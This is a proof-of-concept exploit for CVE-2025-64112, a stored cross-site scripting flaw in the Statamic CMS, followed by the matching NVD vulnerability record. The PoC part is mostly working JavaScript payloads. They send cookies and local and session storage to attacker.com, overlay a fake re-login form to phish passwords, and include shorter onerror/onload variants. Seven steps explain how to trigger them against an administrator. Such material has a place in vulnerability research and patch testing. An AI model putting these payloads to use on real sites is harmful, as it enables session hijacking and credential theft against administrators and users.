CVE-2025-64112

// CVE-2025-64112 Stored XSS PoC for Statematic CMS // Target: Collections or Taxonomies fields // Required: Authenticated user with content creation permissions // Example malicious payload for XSS injection // This payload can be injected into Collection/Taxonomy field names or values const xssPayload = ` <script> // Cookie stealing payload fetch('https://attacker.com/steal?cookie=' + document.cookie); // Session hijacking const sessionData = { cookies: document.cookie, localStorage: localStorage, sessionStorage: sessionStorage, userAgent: navigator.userAgent }; // Send stolen data to attacker server fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify(sessionData), headers: {'Content-Type': 'application/json'} }); // DOM manipulation for phishing document.body.innerHTML += '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999;"><h1>Session Expired - Please Re-login</h1><form action="https://attacker.com/phish"><input name="username"><input name="password" type="password"><button>Submit</button></form></div>'; </script> `; // Alternative shorter payload examples: // <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)"> // <svg/onload=fetch('https://attacker.com/?d='+btoa(document.domain))> // <body onload="fetch('https://attacker.com/?s='+sessionStorage.getItem('token'))"> // Steps to exploit: // 1. Authenticate to Statematic CMS with low-privilege account // 2. Navigate to Collections or Taxonomies management // 3. Create new Collection/Taxonomy or edit existing one // 4. Inject XSS payload into field name or value // 5. Save the content // 6. Wait for admin/high-privilege user to view the content // 7. XSS executes in victim's browser context

{"cve": {"id": "CVE-2025-64112", "sourceIdentifier": "[email protected]", "published": "2025-10-30T18:15:33.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statmatic is a Laravel and Git powered content management system (CMS). Stored XSS vulnerabilities in Collections and Taxonomies allow authenticated users with content creation permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This vulnerability is fixed in 5.22.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/statamic/cms/commit/e513751f433679ce698606e20c554a0c839987c1", "source": "[email protected]"}, {"url": "https://github.com/statamic/cms/security/advisories/GHSA-g59r-24g3-h7cm", "source": "[email protected]"}]}}